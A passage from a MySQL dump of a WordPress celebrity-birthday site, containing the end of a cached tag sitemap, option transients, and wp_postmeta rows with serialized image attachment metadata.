<loc>https://birthdaypedia.com/tag/top-model/</loc>\n <lastmod>2015-10-14T17:33:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/toy-story-voices/</loc>\n <lastmod>2015-10-14T18:24:42+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tracy-morgan/</loc>\n <lastmod>2016-11-28T19:30:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tupac-amaru-shakur/</loc>\n <lastmod>2015-10-14T17:56:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tupak-shakur/</loc>\n <lastmod>2015-10-14T17:56:47+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv/</loc>\n <lastmod>2015-10-09T17:07:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-actor/</loc>\n <lastmod>2015-10-15T16:41:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-actress/</loc>\n <lastmod>2017-06-20T16:09:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-celebrities/</loc>\n <lastmod>2015-10-14T17:46:52+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-comedian/</loc>\n <lastmod>2015-10-14T18:13:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-host/</loc>\n <lastmod>2016-11-23T03:16:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-show/</loc>\n <lastmod>2016-11-28T22:56:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-show-host/</loc>\n <lastmod>2015-10-09T16:42:40+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-shows/</loc>\n <lastmod>2016-11-28T16:59:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-stars/</loc>\n <lastmod>2015-10-14T14:34:01+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/tv-talk-show/</loc>\n <lastmod>2016-11-28T22:46:49+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/twilight/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/twilight-stars/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/two-and-a-half-men/</loc>\n <lastmod>2015-10-09T17:07:10+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/u-s-senator/</loc>\n <lastmod>2016-11-28T16:16:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/un-refugee-agency/</loc>\n <lastmod>2015-10-14T17:09:23+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/urban-ac-and-mainstream/</loc>\n <lastmod>2015-10-14T18:22:43+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/us-president/</loc>\n <lastmod>2015-10-09T18:24:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/usc-trojan-football-fan/</loc>\n <lastmod>2015-10-14T18:31:05+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/victorias-secret-angel/</loc>\n <lastmod>2016-11-28T16:59:32+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin-age/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin-bio/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin-biography/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin-birthday/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin-facts/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/vladimir-putin-russia/</loc>\n <lastmod>2015-10-08T21:12:37+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/water-for-elephants-cast/</loc>\n <lastmod>2015-10-14T15:51:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/whats-new/</loc>\n <lastmod>2015-10-14T15:54:22+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-drake-birthday/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-is-drakes-birthdayf/</loc>\n <lastmod>2015-11-23T22:32:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-is-eminems-birthday/</loc>\n <lastmod>2015-10-30T16:04:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-is-gwen-stefanis-birthday/</loc>\n <lastmod>2015-10-08T18:23:58+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-is-kim-kardashians-birthday/</loc>\n <lastmod>2015-11-09T18:50:19+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-was-carole-lombard/</loc>\n <lastmod>2015-10-06T21:42:56+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-was-eleanor-roosevelt-born/</loc>\n <lastmod>2015-10-15T20:58:45+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-was-hugh-jackman-born/</loc>\n <lastmod>2015-10-15T21:42:57+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-was-john-lennon-born/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/when-was-russell-simmons-born/</loc>\n <lastmod>2015-10-09T16:27:38+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/who-shot-john-lennon/</loc>\n <lastmod>2015-10-15T15:20:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/whoopi-goldberg/</loc>\n <lastmod>2016-11-28T19:13:09+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/wiki/</loc>\n <lastmod>2015-10-09T16:52:29+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/wiki-jeff-goldblum/</loc>\n <lastmod>2015-11-20T20:56:30+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/womens-wear/</loc>\n <lastmod>2017-06-20T16:08:48+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/world-best-singer/</loc>\n <lastmod>2015-10-14T16:25:14+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/world-boxing-council-heavyweight-championship/</loc>\n <lastmod>2015-10-14T18:20:00+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/writer/</loc>\n <lastmod>2016-11-28T22:56:11+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/young-famous-female-singer/</loc>\n <lastmod>2015-10-14T18:44:20+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/youtuber/</loc>\n <lastmod>2015-10-09T18:23:06+00:00</lastmod>\n </url>\n <url>\n <loc>https://birthdaypedia.com/tag/zachary-quinto/</loc>\n <lastmod>2015-10-14T16:30:12+00:00</lastmod>\n </url>\n</urlset>\";}}','no'),(107730,'_transient_doing_cron','1702839243.7335069179534912109375','yes'),(107758,'_site_transient_timeout_theme_roots','1674814419','no'),(107759,'_site_transient_theme_roots','a:7:{s:9:\"Newspaper\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:14:\"twentyfourteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";s:14:\"twentythirteen\";s:7:\"/themes\";s:11:\"wp-techdesk\";s:7:\"/themes\";}','no'),(107769,'rs-templates-new','','no'),(107770,'rs-templates','a:1:{s:9:\"templates\";b:0;}','no'),(107821,'_transient_timeout_wpseo_link_table_inaccessible','1694714358','no'),(107822,'_transient_wpseo_link_table_inaccessible','1','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_postmeta`
--
DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `post_id` (`post_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3847 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_postmeta`
--
LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (1,2,'_wp_page_template','default'),(5,4,'_edit_lock','1444833375:6'),(6,4,'_edit_last','6'),(7,5,'_wp_attached_file','2015/06/Country-Legend-Tim-McGraw.jpg'),(8,5,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:794;s:6:\"height\";i:605;s:4:\"file\";s:37:\"2015/06/Country-Legend-Tim-McGraw.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-768x585.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:585;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:35:\"Country-Legend-Tim-McGraw-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:36:\"Country-Legend-Tim-McGraw-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-696x530.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-794x580.jpg\";s:5:\"width\";i:794;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:37:\"Country-Legend-Tim-McGraw-551x420.jpg\";s:5:\"width\";i:551;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D200\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1368615554\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"26\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(9,5,'_wp_attachment_image_alt','Country Legend Tim McGraw'),(10,4,'_thumbnail_id','5'),(12,6,'_edit_lock','1444834649:6'),(15,6,'_edit_last','6'),(16,8,'_wp_attached_file','2015/06/Dwayne-The-Rock-Johnson.jpg'),(17,8,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:819;s:6:\"height\";i:1024;s:4:\"file\";s:35:\"2015/06/Dwayne-The-Rock-Johnson.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-768x960.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Dwayne-The-Rock-Johnson-819x1024.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:33:\"Dwayne-The-Rock-Johnson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:34:\"Dwayne-The-Rock-Johnson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-696x870.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:870;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-819x580.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:35:\"Dwayne-The-Rock-Johnson-336x420.jpg\";s:5:\"width\";i:336;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18,6,'_thumbnail_id','8'),(21,10,'_edit_lock','1444834675:6'),(22,10,'_edit_last','6'),(25,11,'_wp_attached_file','2015/06/Country-Singer-Randy-Travist.jpg'),(26,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:847;s:6:\"height\";i:567;s:4:\"file\";s:40:\"2015/06/Country-Singer-Randy-Travist.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:38:\"Country-Singer-Randy-Travist-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:39:\"Country-Singer-Randy-Travist-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-696x466.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:466;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:40:\"Country-Singer-Randy-Travist-627x420.jpg\";s:5:\"width\";i:627;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.2\";s:6:\"credit\";s:11:\"Ryan Carter\";s:6:\"camera\";s:10:\"NIKON D200\";s:7:\"caption\";s:80:\"A close up of a guitarists hands playing acoustic guitar. Narrow depth of field.\";s:17:\"created_timestamp\";s:10:\"1227456774\";s:9:\"copyright\";s:20:\"(C) Ryan Carter 2008\";s:12:\"focal_length\";s:2:\"36\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:9:\"Guitarist\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:44:{i:0;s:8:\"acoustic\";i:1;s:5:\"audio\";i:2;s:5:\"blues\";i:3;s:5:\"chord\";i:4;s:7:\"classic\";i:5;s:8:\"close-up\";i:6;s:7:\"concert\";i:7;s:7:\"country\";i:8;s:8:\"electric\";i:9;s:7:\"fingers\";i:10;s:9:\"fretboard\";i:11;s:6:\"guitar\";i:12;s:9:\"guitarist\";i:13;s:4:\"hand\";i:14;s:7:\"harmony\";i:15;s:10:\"instrument\";i:16;s:4:\"jazz\";i:17;s:6:\"melody\";i:18;s:5:\"music\";i:19;s:7:\"musical\";i:20;s:8:\"musician\";i:21;s:4:\"neck\";i:22;s:7:\"perform\";i:23;s:9:\"performer\";i:24;s:4:\"pick\";i:25;s:4:\"play\";i:26;s:6:\"player\";i:27;s:4:\"rock\";i:28;s:4:\"song\";i:29;s:5:\"sound\";i:30;s:5:\"stage\";i:31;s:6:\"string\";i:32;s:4:\"tune\";i:33;s:3:\"pop\";i:34;s:5:\"style\";i:35;s:13:\"entertainment\";i:36;s:4:\"wood\";i:37;s:4:\"band\";i:38;s:4:\"club\";i:39;s:6:\"studio\";i:40;s:4:\"solo\";i:41;s:6:\"rocker\";i:42;s:11:\"performance\";i:43;s:9:\"classical\";}}}'),(27,11,'_wp_attachment_image_alt','Country Singer Randy Travist'),(28,10,'_thumbnail_id','11'),(31,12,'_edit_lock','1444834729:6'),(34,12,'_edit_last','6'),(35,14,'_wp_attached_file','2015/06/Pop-Singer-Chris-Brown.jpg'),(36,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:34:\"2015/06/Pop-Singer-Chris-Brown.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"Pop-Singer-Chris-Brown-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:32:\"Pop-Singer-Chris-Brown-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:33:\"Pop-Singer-Chris-Brown-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:34:\